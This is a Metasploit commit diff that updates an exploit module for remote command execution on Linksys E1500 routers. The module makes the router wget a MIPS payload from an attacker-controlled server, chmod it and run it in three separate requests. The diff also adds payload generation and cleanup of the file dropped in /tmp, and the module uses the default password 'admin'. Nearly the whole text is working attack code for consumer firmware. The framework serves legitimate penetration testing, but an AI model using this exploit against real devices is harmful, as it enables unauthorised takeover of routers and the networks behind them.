msftidy, generate exe, register_file_for_cleanup

m-1-k-3 · m-1-k-3 · commit 0164cc34bedf · 2013-03-29T19:00:04.000+01:00
diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -12,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::Remote::HttpServer
+	include Msf::Exploit::EXE
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -39,13 +41,32 @@ def initialize(info = {})
 							'Arch' => ARCH_CMD,
 							'Platform' => 'unix',
 							#only payload cmd/unix/generic should be possible
+							'Payload'        =>
+								{
+								'Compat'   =>
+									{
+									#not working :(
+									'PayloadType' => 'cmd',
+									'RequiredCmd' => 'generic'
+									}
+								},
 						}
 					],
 					[ 'Linux Payload',
 						{
 							'Arch' => ARCH_MIPSLE,
 							'Platform' => 'linux',
 							'DisableNops' => true,
+							#only mipsel payloads working ...
+							'Payload'        =>
+								{
+								'Compat'   =>
+									{
+									#not working :(
+									'PayloadType' => 'mipsle',
+									'RequiredCmd' => 'shell'
+									}
+								},
 						}
 					],
 				],
@@ -59,7 +80,7 @@ def initialize(info = {})
 				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
 				OptString.new('DOWNHOST',  [ false, 'The host to request the MIPS payload from' ]),
 				OptString.new('DOWNFILE',  [ false, 'Filename to download, (default: random)' ]),
-				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
+				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine (do not use 0.0.0.0)' ]),
 			], self.class)
 	end
 
@@ -130,17 +151,14 @@ def exploit
 		end
 
 		if target.name =~ /CMD/
+
 			cmd = payload.encoded
 			request(cmd,user,pass,uri)
+
 		else
 			#lets get some shells ...
 
-			# We must regenerate the payload-> not sure if this is the right way
-			arch = "ARCH_MIPSLE"
-			plat = "linux"
-			p = exploit_regenerate_payload(plat, arch)
-
-			@pl = p.encoded_exe
+			@pl = generate_payload_exe
 
 			#
 			# start our server
@@ -150,7 +168,7 @@ def exploit
 			if (datastore['DOWNHOST'])
 				service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
 			else
-				#easy way ... do not use SSL ;)
+				#do not use SSL ;)
 				if datastore['SSL']
 					ssl_restore = true
 					datastore['SSL'] = false
@@ -169,32 +187,34 @@ def exploit
 			end
 
 			print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
-	
+
 			#this filename is used to store the payload on the device
 			filename = rand_text_alpha_lower(8)
-	
+			register_file_for_cleanup("/tmp/#{filename}")
+
+			#not working if we send all command together -> lets take three requests
 			cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
-	
+
 			request(cmd,user,pass,uri)
-	
+
 			#
 			# chmod
 			#
-	
+
 			cmd = "chmod 777 /tmp/#{filename}"
-	
+
 			print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
-	
+
 			request(cmd,user,pass,uri)
-	
+
 			#
 			# execute
 			#
-	
+
 			cmd = "/tmp/#{filename}"
-	
+
 			print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
-	
+
 			request(cmd,user,pass,uri)
 		end
 
